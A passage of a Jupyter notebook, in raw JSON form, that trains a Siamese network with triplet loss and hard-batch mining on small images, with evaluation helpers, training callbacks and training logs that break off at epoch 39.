"def triplet_loss(y_true, y_pred):\n anchor, positive, negative = y_pred[:,:emb_size], y_pred[:,emb_size:2*emb_size],y_pred[:,2*emb_size:]\n positive_dist = tf.reduce_mean(tf.square(anchor - positive), axis=1)\n negative_dist = tf.reduce_mean(tf.square(anchor - negative), axis=1)\n return tf.maximum(positive_dist - negative_dist + alpha, 0.)",
"_____no_output_____"
]
],
[
[
"### Data Generator\n\nThis function creates hard batches for the network to train on. `y` is required by TF but not by our model, so just return a filler to keep TF happy.",
"_____no_output_____"
]
],
[
[
"def data_generator(batch_size=256, num_hard=50, split=\"train\"):\n while True:\n x = create_hard_batch(batch_size, num_hard, split)\n y = np.zeros((batch_size, 3*emb_size))\n yield x, y",
"_____no_output_____"
]
],
[
[
"### Evaluation\n\nAllows for the model's metrics to be visualised and evaluated. Based on [this Medium post](https://medium.com/@crimy/one-shot-learning-siamese-networks-and-triplet-loss-with-keras-2885ed022352) and [this GitHub notebook](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).",
"_____no_output_____"
]
],
[
[
"def compute_dist(a,b):\n return np.linalg.norm(a-b)\n\ndef compute_probs(network,X,Y):\n '''\n Input\n network : current NN to compute embeddings\n X : tensor of shape (m,w,h,1) containing pics to evaluate\n Y : tensor of shape (m,) containing true class\n \n Returns\n probs : array of shape (m,m) containing distances\n \n '''\n m = X.shape[0]\n nbevaluation = int(m*(m-1)/2)\n probs = np.zeros((nbevaluation))\n y = np.zeros((nbevaluation))\n \n #Compute all embeddings for all imgs with current embedding network\n embeddings = embedding_model.predict(X)\n \n k = 0\n \n # For each img in the evaluation set\n for i in range(m):\n # Against all other images\n for j in range(i+1,m):\n # compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes\n probs[k] = -compute_dist(embeddings[i,:],embeddings[j,:])\n if (Y[i]==Y[j]):\n y[k] = 1\n #print(\"{3}:{0} vs {1} : \\t\\t\\t{2}\\tSAME\".format(i,j,probs[k],k, Y[i], Y[j]))\n else:\n y[k] = 0\n #print(\"{3}:{0} vs {1} : {2}\\tDIFF\".format(i,j,probs[k],k, Y[i], Y[j]))\n k += 1\n return probs, y\n\n\ndef compute_metrics(probs,yprobs):\n '''\n Returns\n fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]\n tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].\n thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1\n auc : Area Under the ROC Curve metric\n '''\n # calculate AUC\n auc = roc_auc_score(yprobs, probs)\n # calculate roc curve\n fpr, tpr, thresholds = roc_curve(yprobs, probs)\n \n return fpr, tpr, thresholds,auc\n\ndef draw_roc(fpr, tpr,thresholds, auc):\n #find threshold\n targetfpr=1e-3\n _, idx = find_nearest(fpr,targetfpr)\n threshold = thresholds[idx]\n recall = tpr[idx]\n \n \n # plot no skill\n plt.plot([0, 1], [0, 1], linestyle='--')\n # plot the roc curve for the model\n plt.plot(fpr, tpr, marker='.')\n plt.title('AUC: {0:.3f}\\nSensitivity : {2:.1%} @FPR={1:.0e}\\nThreshold={3})'.format(auc,targetfpr,recall,abs(threshold) ))\n # show the plot\n plt.show()\n \ndef find_nearest(array,value):\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return array[idx-1],idx-1\n else:\n return array[idx],idx\n \ndef draw_interdist(network, epochs):\n interdist = compute_interdist(network)\n \n data = []\n for i in range(num_classes):\n data.append(np.delete(interdist[i,:],[i]))\n\n fig, ax = plt.subplots()\n ax.set_title('Evaluating embeddings distance from each other after {0} epochs'.format(epochs))\n ax.set_ylim([0,3])\n plt.xlabel('Classes')\n plt.ylabel('Distance')\n ax.boxplot(data,showfliers=False,showbox=True)\n locs, labels = plt.xticks()\n plt.xticks(locs,np.arange(num_classes))\n\n plt.show()\n \n \ndef compute_interdist(network):\n '''\n Computes sum of distances between all classes embeddings on our reference test image: \n d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... d(8,9)\n A good model should have a large distance between all theses embeddings\n \n Returns:\n array of shape (num_classes,num_classes) \n '''\n res = np.zeros((num_classes,num_classes))\n \n ref_images = np.zeros((num_classes, x_test_w_h))\n \n #generates embeddings for reference images\n for i in range(num_classes):\n ref_images[i,:] = x_test[i]\n \n ref_embeddings = network.predict(ref_images)\n \n for i in range(num_classes):\n for j in range(num_classes):\n res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])\n return res\n\ndef DrawTestImage(network, images, refidx=0):\n '''\n Evaluate some pictures vs some samples in the test set\n image must be of shape(1,w,h,c)\n \n Returns\n scores : result of the similarity scores with the basic images => (N)\n \n '''\n nbimages = images.shape[0]\n \n \n #generates embedings for given images\n image_embedings = network.predict(images)\n \n #generates embedings for reference images\n ref_images = np.zeros((num_classes,x_test_w_h))\n for i in range(num_classes):\n images_at_this_index_are_of_class_i = np.squeeze(np.where(y_test == i))\n ref_images[i,:] = x_test[images_at_this_index_are_of_class_i[refidx]]\n \n \n ref_embedings = network.predict(ref_images)\n \n for i in range(nbimages):\n # Prepare the figure\n fig=plt.figure(figsize=(16,2))\n subplot = fig.add_subplot(1,num_classes+1,1)\n plt.axis(\"off\")\n plotidx = 2\n \n # Draw this image \n plt.imshow(np.reshape(images[i], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\n subplot.title.set_text(\"Test image\")\n \n for ref in range(num_classes):\n #Compute distance between this images and references\n dist = compute_dist(image_embedings[i,:],ref_embedings[ref,:])\n #Draw\n subplot = fig.add_subplot(1,num_classes+1,plotidx)\n plt.axis(\"off\")\n plt.imshow(np.reshape(ref_images[ref, :], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\n subplot.title.set_text((\"Class {0}\\n{1:.3e}\".format(ref,dist)))\n plotidx += 1\n\ndef generate_prototypes(x_data, y_data, embedding_model):\n classes = np.unique(y_data)\n prototypes = {}\n\n for c in classes:\n #c = classes[0]\n # Find all images of the chosen test class\n locations_of_c = np.where(y_data == c)[0]\n\n imgs_of_c = x_data[locations_of_c]\n\n imgs_of_c_embeddings = embedding_model.predict(imgs_of_c)\n\n # Get the median of the embeddings to generate a prototype for the class (reshaping for PCA)\n prototype_for_c = np.median(imgs_of_c_embeddings, axis = 0).reshape(1, -1)\n # Add it to the prototype dict\n prototypes[c] = prototype_for_c\n \n return prototypes\n \ndef test_one_shot_prototypes(network, sample_embeddings):\n distances_from_img_to_test_against = []\n # As the img to test against is in index 0, we compare distances between img@0 and all others\n for i in range(1, len(sample_embeddings)):\n distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))\n # As the correct img will be at distances_from_img_to_test_against index 0 (sample_imgs index 1),\n # If the smallest distance in distances_from_img_to_test_against is at index 0, \n # we know the one shot test got the right answer\n is_min = distances_from_img_to_test_against[0] == min(distances_from_img_to_test_against)\n is_max = distances_from_img_to_test_against[0] == max(distances_from_img_to_test_against)\n return int(is_min and not is_max)\n \ndef n_way_accuracy_prototypes(n_val, n_way, network):\n num_correct = 0\n \n for val_step in range(n_val):\n num_correct += load_one_shot_test_batch_prototypes(n_way, network)\n \n accuracy = num_correct / n_val * 100\n \n return accuracy\n\ndef load_one_shot_test_batch_prototypes(n_way, network):\n \n labels = np.unique(y_test)\n # Reduce the label set down from size n_classes to n_samples \n labels = np.random.choice(labels, size = n_way, replace = False)\n\n # Choose a class as the test image\n label = random.choice(labels)\n # Find all images of the chosen test class\n imgs_of_label = np.where(y_test == label)[0]\n\n # Randomly select a test image of the selected class, return it's index\n img_of_label_idx = random.choice(imgs_of_label)\n\n # Expand the array at the selected indexes into useable images\n img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)\n \n sample_embeddings = []\n # Get the anchor image embedding\n anchor_prototype = network.predict(img_of_label)\n sample_embeddings.append(anchor_prototype)\n \n # Get the prototype embedding for the positive class\n positive_prototype = prototypes[label]\n \n sample_embeddings.append(positive_prototype)\n \n # Get the negative prototype embeddings\n # Remove the selected test class from the list of labels based on it's index \n label_idx_in_labels = np.where(labels == label)[0]\n other_labels = np.delete(labels, label_idx_in_labels)\n \n # Get the embedding for each of the remaining negatives\n for other_label in other_labels:\n negative_prototype = prototypes[other_label]\n sample_embeddings.append(negative_prototype)\n \n correct = test_one_shot_prototypes(network, sample_embeddings)\n\n return correct\n\n\ndef visualise_n_way_prototypes(n_samples, network):\n labels = np.unique(y_test)\n # Reduce the label set down from size n_classes to n_samples \n labels = np.random.choice(labels, size = n_samples, replace = False)\n\n # Choose a class as the test image\n label = random.choice(labels)\n # Find all images of the chosen test class\n imgs_of_label = np.where(y_test == label)[0]\n\n # Randomly select a test image of the selected class, return it's index\n img_of_label_idx = random.choice(imgs_of_label)\n\n # Get another image idx that we know is of the test class for the sample set\n label_sample_img_idx = random.choice(imgs_of_label)\n\n # Expand the array at the selected indexes into useable images\n img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)\n label_sample_img = np.expand_dims(x_test[label_sample_img_idx],axis=0)\n \n # Make the first img in the sample set the chosen test image, the second the other image\n sample_imgs = np.empty((0, x_test_w_h))\n sample_imgs = np.append(sample_imgs, img_of_label, axis=0)\n sample_imgs = np.append(sample_imgs, label_sample_img, axis=0)\n \n sample_embeddings = []\n \n # Get the anchor embedding image\n anchor_prototype = network.predict(img_of_label)\n sample_embeddings.append(anchor_prototype)\n \n # Get the prototype embedding for the positive class\n positive_prototype = prototypes[label]\n sample_embeddings.append(positive_prototype)\n\n # Get the negative prototype embeddings\n # Remove the selected test class from the list of labels based on it's index \n label_idx_in_labels = np.where(labels == label)[0]\n other_labels = np.delete(labels, label_idx_in_labels)\n # Get the embedding for each of the remaining negatives\n for other_label in other_labels:\n negative_prototype = prototypes[other_label]\n sample_embeddings.append(negative_prototype)\n \n # Find all images of the other class\n imgs_of_other_label = np.where(y_test == other_label)[0]\n # Randomly select an image of the selected class, return it's index\n another_sample_img_idx = random.choice(imgs_of_other_label)\n # Expand the array at the selected index into useable images\n another_sample_img = np.expand_dims(x_test[another_sample_img_idx],axis=0)\n # Add the image to the support set\n sample_imgs = np.append(sample_imgs, another_sample_img, axis=0)\n \n distances_from_img_to_test_against = []\n \n # As the img to test against is in index 0, we compare distances between img@0 and all others\n for i in range(1, len(sample_embeddings)):\n distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))\n \n # + 1 as distances_from_img_to_test_against doesn't include the test image\n min_index = distances_from_img_to_test_against.index(min(distances_from_img_to_test_against)) + 1\n \n return sample_imgs, min_index\n\ndef evaluate(embedding_model, epochs = 0):\n probs,yprob = compute_probs(embedding_model, x_test[:500, :], y_test[:500])\n fpr, tpr, thresholds, auc = compute_metrics(probs,yprob)\n draw_roc(fpr, tpr, thresholds, auc)\n draw_interdist(embedding_model, epochs)\n\n for i in range(3):\n DrawTestImage(embedding_model, np.expand_dims(x_train[i],axis=0))",
"_____no_output_____"
]
],
[
[
"### Model Training Setup\n\nFaceNet, the original triplet batch paper, draws a large random sample of triplets respecting the class distribution then picks N/2 hard and N/2 random samples (N = batch size), along with an `alpha` of 0.2\n\nLogs out to Tensorboard, callback adapted from https://stackoverflow.com/a/52581175.\n\nSaves best model only based on a validation loss. Adapted from https://stackoverflow.com/a/58103272.",
"_____no_output_____"
]
],
[
[
"# Hyperparams\nbatch_size = 256\nepochs = 100\nsteps_per_epoch = int(x_train.shape[0]/batch_size)\nval_steps = int(x_test.shape[0]/batch_size)\nalpha = 0.2\nnum_hard = int(batch_size * 0.5) # Number of semi-hard triplet examples in the batch\nlr = 0.00006\noptimiser = 'Adam'\nemb_size = 10\n\nwith tf.device(\"/cpu:0\"):\n # Create the embedding model\n print(\"Generating embedding model... \\n\")\n embedding_model = create_embedding_model(emb_size)\n \n print(\"\\nGenerating SNN... \\n\")\n # Create the SNN\n siamese_net = create_SNN(embedding_model)\n # Compile the SNN\n optimiser_obj = Adam(lr = lr)\n siamese_net.compile(loss=triplet_loss, optimizer= optimiser_obj)\n \n # Store visualisations of the embeddings using PCA for display next to \"after training\" for comparisons\n num_vis = 500 # Take only the first num_vis elements of the test set to visualise\n embeddings_before_train = embedding_model.predict(x_test[:num_vis, :])\n pca = PCA(n_components=2)\n decomposed_embeddings_before = pca.fit_transform(embeddings_before_train)\n\n\n# Display evaluation the untrained model\nprint(\"\\nEvaluating the model without training for a baseline...\\n\")\nevaluate(embedding_model)\n\n# Set up logging directory\n## Use date-time as logdir name:\n#dt = datetime.now().strftime(\"%Y%m%dT%H%M\")\n#logdir = os.path.join(\"PATH/TO/LOGDIR\",dt)\n\n## Use a custom non-dt name:\nname = \"snn-example-run\"\nlogdir = os.path.join(\"PATH/TO/LOGDIR\",name)\n\nif not os.path.exists(logdir):\n os.mkdir(logdir)\n\n## Callbacks:\n# Create the TensorBoard callback\ntensorboard = tf.keras.callbacks.TensorBoard(\n log_dir = logdir,\n histogram_freq=0,\n batch_size=batch_size,\n write_graph=True,\n write_grads=True, \n write_images = True, \n update_freq = 'epoch', \n profile_batch=0\n)\n\n# Training logger\ncsv_log = os.path.join(logdir, 'training.csv')\ncsv_logger = CSVLogger(csv_log, separator=',', append=True)\n\n# Only save the best model weights based on the val_loss\ncheckpoint = ModelCheckpoint(os.path.join(logdir, 'snn_model-{epoch:02d}-{val_loss:.2f}.h5'),\n monitor='val_loss', verbose=1,\n save_best_only=True, save_weights_only=True, \n mode='auto')\n\n# Save the embedding mode weights based on the main model's val loss\n# This is needed to reecreate the emebedding model should we wish to visualise\n# the latent space at the saved epoch\nclass SaveEmbeddingModelWeights(Callback):\n def __init__(self, filepath, monitor='val_loss', verbose=1):\n super(Callback, self).__init__()\n self.monitor = monitor\n self.verbose = verbose\n self.best = np.Inf\n self.filepath = filepath\n\n def on_epoch_end(self, epoch, logs={}):\n current = logs.get(self.monitor)\n if current is None:\n warnings.warn(\"SaveEmbeddingModelWeights requires %s available!\" % self.monitor, RuntimeWarning)\n\n if current < self.best:\n filepath = self.filepath.format(epoch=epoch + 1, **logs)\n #if self.verbose == 1:\n #print(\"Saving embedding model weights at %s\" % filepath)\n embedding_model.save_weights(filepath, overwrite = True)\n self.best = current\n\n# Save the embedding model weights if you save a new snn best model based on the model checkpoint above\nemb_weight_saver = SaveEmbeddingModelWeights(os.path.join(logdir, 'emb_model-{epoch:02d}.h5'))\n\n\ncallbacks = [tensorboard, csv_logger, checkpoint, emb_weight_saver]\n\n\n# Save model configs to JSON\nmodel_json = siamese_net.to_json()\nwith open(os.path.join(logdir, \"siamese_config.json\"), \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n \nmodel_json = embedding_model.to_json()\nwith open(os.path.join(logdir, \"embedding_config.json\"), \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n \n\nhyperparams = {'batch_size' : batch_size,\n 'epochs' : epochs, \n 'steps_per_epoch' : steps_per_epoch, \n 'val_steps' : val_steps, \n 'alpha' : alpha, \n 'num_hard' : num_hard, \n 'optimiser' : optimiser,\n 'lr' : lr,\n 'emb_size' : emb_size\n }\n\n\nwith open(os.path.join(logdir, \"hyperparams.json\"), \"w\") as json_file:\n json.dump(hyperparams, json_file)\n \n# Set the model to TB\ntensorboard.set_model(siamese_net)\n\n\ndef delete_older_model_files(filepath):\n \n model_dir = filepath.split(\"emb_model\")[0]\n \n # Get model files\n model_files = os.listdir(model_dir)\n\n # Get only the emb_model files\n emb_model_files = [file for file in model_files if \"emb_model\" in file]\n # Get the epoch nums of the emb_model_files\n emb_model_files_epoch_nums = [int(file.split(\"-\")[1].split(\".h5\")[0]) for file in emb_model_files]\n\n # Find all the snn model files\n snn_model_files = [file for file in model_files if \"snn_model\" in file]\n\n # Sort, get highest epoch num\n emb_model_files_epoch_nums.sort()\n highest_epoch_num = str(emb_model_files_epoch_nums[-1]).zfill(2)\n\n # Filter the emb_model and snn_model file lists to remove the highest epoch number ones\n emb_model_files_without_highest = [file for file in emb_model_files if highest_epoch_num not in file]\n snn_model_files_without_highest = [file for file in snn_model_files if (\"-\" + highest_epoch_num + \"-\") not in file]\n\n # Delete the non-highest model files from the subdir\n if len(emb_model_files_without_highest) != 0:\n print(\"Deleting previous best model file\")\n for model_file_list in [emb_model_files_without_highest, snn_model_files_without_highest]:\n for file in model_file_list:\n os.remove(os.path.join(model_dir, file))",
"Generating embedding model... \n\nModel: \"sequential_2\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense_4 (Dense) (None, 4096) 3215360 \n_________________________________________________________________\ndense_5 (Dense) (None, 10) 40970 \n=================================================================\nTotal params: 3,256,330\nTrainable params: 3,256,330\nNon-trainable params: 0\n_________________________________________________________________\n\nGenerating SNN... \n\nModel: \"model_4\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_7 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\ninput_8 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\ninput_9 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\nsequential_2 (Sequential) (None, 10) 3256330 input_7[0][0] \n input_8[0][0] \n input_9[0][0] \n__________________________________________________________________________________________________\nconcatenate_2 (Concatenate) (None, 30) 0 sequential_2[1][0] \n sequential_2[2][0] \n sequential_2[3][0] \n==================================================================================================\nTotal params: 3,256,330\nTrainable params: 3,256,330\nNon-trainable params: 0\n__________________________________________________________________________________________________\n\nEvaluating the model without training for a baseline...\n\n"
]
],
[
[
"### Show example batches\n\nBased on code found [here](https://zhangruochi.com/Create-a-Siamese-Network-with-Triplet-Loss-in-Keras/2020/08/11/).",
"_____no_output_____"
]
],
[
[
"# Display sample batches. This has to be performed after the embedding model is created\n# as create_batch_hard utilises the model to see which batches are actually hard.\n\nexamples = create_batch(1)\nprint(\"Example triplet batch:\")\nplot_triplets(examples)\n\nprint(\"Example semi-hard triplet batch:\")\nex_hard = create_hard_batch(1, 1, split=\"train\")\nplot_triplets(ex_hard)",
"Example triplet batch:\n"
]
],
[
[
"### Training\n\nUsing `.fit(workers = 0)` fixes the error when using hard batches where TF can't predict on the embedding network whilst fitting the siamese network (see: https://github.com/keras-team/keras/issues/5511#issuecomment-427666222).",
"_____no_output_____"
]
],
[
[
"def get_num_gpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'GPU'])\n\n## Training:\n#print(\"Logging out to Tensorboard at:\", logdir)\nprint(\"Starting training process!\")\nprint(\"-------------------------------------\")\n\n# Make the model work over the two GPUs we have\nnum_gpus = get_num_gpus()\nparallel_snn = multi_gpu_model(siamese_net, gpus = num_gpus)\nbatch_per_gpu = int(batch_size / num_gpus)\n\nparallel_snn.compile(loss=triplet_loss, optimizer= optimiser_obj)\n\nsiamese_history = parallel_snn.fit(\n data_generator(batch_per_gpu, num_hard),\n steps_per_epoch=steps_per_epoch,\n epochs=epochs,\n verbose=1,\n callbacks=callbacks, \n workers = 0, \n validation_data = data_generator(batch_per_gpu, num_hard, split=\"test\"), \n validation_steps = val_steps)\n\nprint(\"-------------------------------------\")\nprint(\"Training complete.\")",
"Starting training process!\n-------------------------------------\nEpoch 1/100\n233/234 [============================>.] - ETA: 0s - loss: 6.9986\nEpoch 00001: val_loss improved from inf to 5.79736, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-01-5.80.h5\n234/234 [==============================] - 174s 742ms/step - loss: 6.9935 - val_loss: 5.7974\nEpoch 2/100\n233/234 [============================>.] - ETA: 0s - loss: 4.8596\nEpoch 00002: val_loss improved from 5.79736 to 4.00626, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-02-4.01.h5\n234/234 [==============================] - 170s 728ms/step - loss: 4.8560 - val_loss: 4.0063\nEpoch 3/100\n233/234 [============================>.] - ETA: 0s - loss: 3.3463\nEpoch 00003: val_loss improved from 4.00626 to 2.74879, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-03-2.75.h5\n234/234 [==============================] - 170s 725ms/step - loss: 3.3438 - val_loss: 2.7488\nEpoch 4/100\n233/234 [============================>.] - ETA: 0s - loss: 2.2919\nEpoch 00004: val_loss improved from 2.74879 to 1.87885, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-04-1.88.h5\n234/234 [==============================] - 170s 726ms/step - loss: 2.2901 - val_loss: 1.8789\nEpoch 5/100\n233/234 [============================>.] - ETA: 0s - loss: 1.5656\nEpoch 00005: val_loss improved from 1.87885 to 1.28401, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-05-1.28.h5\n234/234 [==============================] - 172s 733ms/step - loss: 1.5644 - val_loss: 1.2840\nEpoch 6/100\n233/234 [============================>.] - ETA: 0s - loss: 1.0720\nEpoch 00006: val_loss improved from 1.28401 to 0.88143, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-06-0.88.h5\n234/234 [==============================] - 174s 742ms/step - loss: 1.0712 - val_loss: 0.8814\nEpoch 7/100\n233/234 [============================>.] - ETA: 0s - loss: 0.7392\nEpoch 00007: val_loss improved from 0.88143 to 0.61174, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-07-0.61.h5\n234/234 [==============================] - 170s 728ms/step - loss: 0.7387 - val_loss: 0.6117\nEpoch 8/100\n233/234 [============================>.] - ETA: 0s - loss: 0.5158\nEpoch 00008: val_loss improved from 0.61174 to 0.43090, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-08-0.43.h5\n234/234 [==============================] - 171s 729ms/step - loss: 0.5155 - val_loss: 0.4309\nEpoch 9/100\n233/234 [============================>.] - ETA: 0s - loss: 0.3670\nEpoch 00009: val_loss improved from 0.43090 to 0.30955, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-09-0.31.h5\n234/234 [==============================] - 171s 731ms/step - loss: 0.3667 - val_loss: 0.3095\nEpoch 10/100\n233/234 [============================>.] - ETA: 0s - loss: 0.2651\nEpoch 00010: val_loss improved from 0.30955 to 0.22544, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-10-0.23.h5\n234/234 [==============================] - 167s 715ms/step - loss: 0.2649 - val_loss: 0.2254\nEpoch 11/100\n233/234 [============================>.] - ETA: 0s - loss: 0.1966\nEpoch 00011: val_loss improved from 0.22544 to 0.17017, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-11-0.17.h5\n234/234 [==============================] - 166s 711ms/step - loss: 0.1965 - val_loss: 0.1702\nEpoch 12/100\n233/234 [============================>.] - ETA: 0s - loss: 0.1488\nEpoch 00012: val_loss improved from 0.17017 to 0.13102, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-12-0.13.h5\n234/234 [==============================] - 167s 713ms/step - loss: 0.1488 - val_loss: 0.1310\nEpoch 13/100\n233/234 [============================>.] - ETA: 0s - loss: 0.1153\nEpoch 00013: val_loss improved from 0.13102 to 0.10136, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-13-0.10.h5\n234/234 [==============================] - 169s 722ms/step - loss: 0.1153 - val_loss: 0.1014\nEpoch 14/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0924\nEpoch 00014: val_loss improved from 0.10136 to 0.08184, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-14-0.08.h5\n234/234 [==============================] - 168s 718ms/step - loss: 0.0923 - val_loss: 0.0818\nEpoch 15/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0752\nEpoch 00015: val_loss improved from 0.08184 to 0.06727, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-15-0.07.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0752 - val_loss: 0.0673\nEpoch 16/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0640\nEpoch 00016: val_loss improved from 0.06727 to 0.05794, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-16-0.06.h5\n234/234 [==============================] - 167s 712ms/step - loss: 0.0640 - val_loss: 0.0579\nEpoch 17/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0548\nEpoch 00017: val_loss improved from 0.05794 to 0.05117, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-17-0.05.h5\n234/234 [==============================] - 169s 720ms/step - loss: 0.0548 - val_loss: 0.0512\nEpoch 18/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0485\nEpoch 00018: val_loss improved from 0.05117 to 0.04612, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-18-0.05.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0485 - val_loss: 0.0461\nEpoch 19/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0439\nEpoch 00019: val_loss improved from 0.04612 to 0.04303, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-19-0.04.h5\n234/234 [==============================] - 168s 716ms/step - loss: 0.0438 - val_loss: 0.0430\nEpoch 20/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0412\nEpoch 00020: val_loss improved from 0.04303 to 0.04107, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-20-0.04.h5\n234/234 [==============================] - 169s 723ms/step - loss: 0.0412 - val_loss: 0.0411\nEpoch 21/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0390\nEpoch 00021: val_loss improved from 0.04107 to 0.03768, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-21-0.04.h5\n234/234 [==============================] - 168s 718ms/step - loss: 0.0390 - val_loss: 0.0377\nEpoch 22/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0367\nEpoch 00022: val_loss improved from 0.03768 to 0.03581, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-22-0.04.h5\n234/234 [==============================] - 167s 715ms/step - loss: 0.0367 - val_loss: 0.0358\nEpoch 23/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0357\nEpoch 00023: val_loss did not improve from 0.03581\n234/234 [==============================] - 168s 720ms/step - loss: 0.0357 - val_loss: 0.0358\nEpoch 24/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0349\nEpoch 00024: val_loss improved from 0.03581 to 0.03299, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-24-0.03.h5\n234/234 [==============================] - 168s 716ms/step - loss: 0.0349 - val_loss: 0.0330\nEpoch 25/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0342\nEpoch 00025: val_loss did not improve from 0.03299\n234/234 [==============================] - 164s 700ms/step - loss: 0.0342 - val_loss: 0.0337\nEpoch 26/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0329\nEpoch 00026: val_loss did not improve from 0.03299\n234/234 [==============================] - 166s 711ms/step - loss: 0.0330 - val_loss: 0.0353\nEpoch 27/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0330\nEpoch 00027: val_loss improved from 0.03299 to 0.03299, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-27-0.03.h5\n234/234 [==============================] - 169s 723ms/step - loss: 0.0330 - val_loss: 0.0330\nEpoch 28/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0328\nEpoch 00028: val_loss did not improve from 0.03299\n234/234 [==============================] - 167s 716ms/step - loss: 0.0328 - val_loss: 0.0335\nEpoch 29/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0328\nEpoch 00029: val_loss improved from 0.03299 to 0.03119, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-29-0.03.h5\n234/234 [==============================] - 168s 719ms/step - loss: 0.0328 - val_loss: 0.0312\nEpoch 30/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0318\nEpoch 00030: val_loss improved from 0.03119 to 0.03046, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-30-0.03.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0319 - val_loss: 0.0305\nEpoch 31/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0317\nEpoch 00031: val_loss did not improve from 0.03046\n234/234 [==============================] - 168s 719ms/step - loss: 0.0317 - val_loss: 0.0320\nEpoch 32/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00032: val_loss did not improve from 0.03046\n234/234 [==============================] - 165s 703ms/step - loss: 0.0312 - val_loss: 0.0316\nEpoch 33/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00033: val_loss improved from 0.03046 to 0.03021, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-33-0.03.h5\n234/234 [==============================] - 170s 726ms/step - loss: 0.0312 - val_loss: 0.0302\nEpoch 34/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0317\nEpoch 00034: val_loss did not improve from 0.03021\n234/234 [==============================] - 170s 727ms/step - loss: 0.0317 - val_loss: 0.0313\nEpoch 35/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0315\nEpoch 00035: val_loss did not improve from 0.03021\n234/234 [==============================] - 167s 715ms/step - loss: 0.0315 - val_loss: 0.0307\nEpoch 36/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0313\nEpoch 00036: val_loss improved from 0.03021 to 0.02951, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-36-0.03.h5\n234/234 [==============================] - 169s 722ms/step - loss: 0.0313 - val_loss: 0.0295\nEpoch 37/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00037: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 710ms/step - loss: 0.0312 - val_loss: 0.0305\nEpoch 38/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00038: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0307 - val_loss: 0.0304\nEpoch 39/100\n233/234 [============================>.] - ETA: 0s - loss: 